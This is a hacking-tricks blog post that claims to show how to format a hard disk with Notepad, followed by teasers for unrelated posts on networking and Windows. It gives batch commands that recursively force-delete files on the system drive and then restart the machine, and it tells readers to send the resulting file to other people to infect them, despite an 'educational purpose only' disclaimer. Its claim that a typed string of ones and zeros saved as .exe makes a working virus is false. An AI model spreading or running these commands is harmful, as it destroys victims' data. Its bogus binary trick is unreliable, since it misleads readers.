Skip to main content

How to format Hard Disk with Notepad


How to Format the Hard Disk With Notepad With Easy Way....

****************** EDUCATION PURPOSE ONLY********************


If you think that notepad is useless then you are wrong because you can do a lot of things with a notepad like you can make a lots of viruses and many things which you can't imagine.
In this hack I will show you how to format a HDD using a notepad. This is really cool.Lets begin Hacking..


Step 1:- Copy The Following In Notepad Exactly as it says


01001011000111110010010101010101010000011111100000


Step 2:- Save As .exe and Any Name give it.

Step 3:- Send the EXE to People And Infect his/her system.


IMPORTANT : This Trick is for Educational Purpose only. DON'T TRY ON YOUR OWN PC. Trickntools is not responsible for it. TRY WITH YOUR OWN RISK.
Do not try it on your PC. Don’t mess around this is for educational purpose only.

             ANOTHER WAY......
Step 1:- Go to notepad and type the following code :
 

@Echo off
Del C:\ *.*|y 


Save it as .bat extension and give it any name.

If you want more worse than it then type the following code in the notepad :
 

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00


and save it as a .bat file


Comments

Popular posts from this blog

About Basic Networking Topology

           Basic Networking Topology This article describes common topologies used for networking. These are a very basic examples, and large networks often use a combination of two or more topologies. Introduction The term "topology" is used to describe the infrastructure of a network. It is a basic map or scheme of how the network is constructed. Viewing the topology of a network is a lot like looking at the map of city. You can see the central points or landmarks. Popular points of the cities are usually surrounded by a dense population of residents. The same is true for computer networks. The popular points (usually servers) are surrounded by residents (client machines) that connect to the server. If you read a networking book about topology, they will probably cover the physical types of topologies like star, ring, bus, and mesh. While these were all commonly used topologies at one point in time, star...

How to Block Unwanted Websites Using HOSTS FILE and hack HOST file

Block or Redirect Unwanted Websites Using HOSTS File The hosts file is one of the interesting and useful feature of both Windows and Linux operating systems that provides many handy options in addressing network nodes. For instance, you can use the hosts file to block annoying ads, pop-ups, banners, porn sites, or even redirect one website to another . In this post I will show you how to play around with the hosts file to accomplish some of the above mentioned jobs.  Let's take some knowledge about host file. What is a hosts File? The hosts file is just like any other computer file that is used by the operating system to map hostnames and domain names on to their corresponding IP addresses . In other words, when you type “google.com” on your browser’s address bar, your computer will look for the hosts file to see if it contains the corresponding IP address for the domain name you typed (google.com). In case if no entry is present i...

Check Your Mother Board Model Number ,Serial Number, Version, And Many More.

How to Check Your Motherboard Model Number on Your Windows PC Whether you need to update drivers, want to check hardware compatibility, or you’re just curious , it’s way easier to check your motherboard model number with these simple tricks than it is to crack open your computer case to check the board itself . Read on as we show you how to check your motherboard model number from the comfort of your keyboard. Why Do I Want To Do This? There are a variety of situations where knowing your motherboard’s model number is important: upgrading your drivers, buying new hardware (you’ll need the proper expansion slots for card-based upgrades and the right memory DIMMS for memory upgrades, etc.), and checking the capabilities of your board if you’re considering upgrading the entire thing.  First Way (SIMPLEST WAY):- In this way there is only two step :- Step 1:- Go to Run(By Pressing Win+R) . Step 2:- Type dxdiag in Run and hit enter . ...